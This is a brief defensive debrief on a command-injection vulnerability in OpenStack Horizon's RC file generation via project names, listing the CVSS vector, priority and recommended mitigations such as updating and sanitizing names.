CVE-2026-55748 OpenStack CVE debrief

Who should care

Administrators and users of OpenStack Horizon, particularly those who allow users to create projects with custom names, should be aware of this vulnerability. This issue may allow users to inject malicious scripts into the OpenStack RC file downloading process.

Technical summary

The vulnerability exists in the script generation for OpenStack RC file downloading in OpenStack Horizon. The scripts are generated with project names that may contain shell metacharacters, allowing for potential script injection. The Common Vulnerability Scoring System (CVSS) vector for this vulnerability is CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L. The weakness associated with this vulnerability is CWE-78.

Defensive priority

Medium

Recommended defensive actions

• Update OpenStack Horizon to version 25.7.4 or later
• Validate and sanitize project names to prevent shell metacharacters
• Implement proper input validation and output encoding
• Monitor OpenStack Horizon logs for suspicious activity
• Restrict project name characters to alphanumeric and underscore
• Use a Web Application Firewall (WAF) to detect and prevent attacks
• Educate users on secure project naming practices

Evidence notes

The information provided is based on data from the National Vulnerability Database (NVD) and the Common Vulnerabilities and Exposures (CVE) database. The CVE record and NVD detail pages provide further information on this vulnerability.

Official resources